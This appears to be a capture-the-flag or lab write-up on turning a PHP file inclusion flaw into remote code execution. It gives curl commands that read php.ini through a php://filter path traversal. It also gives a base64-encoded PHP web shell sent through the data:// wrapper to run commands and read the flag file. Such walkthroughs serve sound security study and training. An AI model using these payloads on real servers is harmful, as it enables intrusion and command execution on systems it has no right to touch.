PHP Wrappers

Try to gain RCE using one of the PHP wrappers and read the flag at /

Step 1 - Check if allow_url_include is on:

Capture the php.ini file:

curl "http://SERVER_IP:SERVER_PORT/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

Copy the base64 string (W1BIUF0KCjs7Ozs7Ozs7O ...SNIP ... 4dGVuc2lvbj1leHBlY3QK) to a file
Look for the allow_url_file with the command cat curl.txt | base64 -d | grep allow_url_include

Step 2 - Remote Code Execution:

Base64 encode a PHP web shell:

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

Test the web shell:

curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

Look for the flag on the / directory:

curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20../../../../'

Retrieve the flag:

curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20../../../37809e2f8952f06139011994726d9ef1.txt'

And we got the flag!

PreviousPHP Filters NextRemote File Inclusion (RFI)

Last updated 5 months ago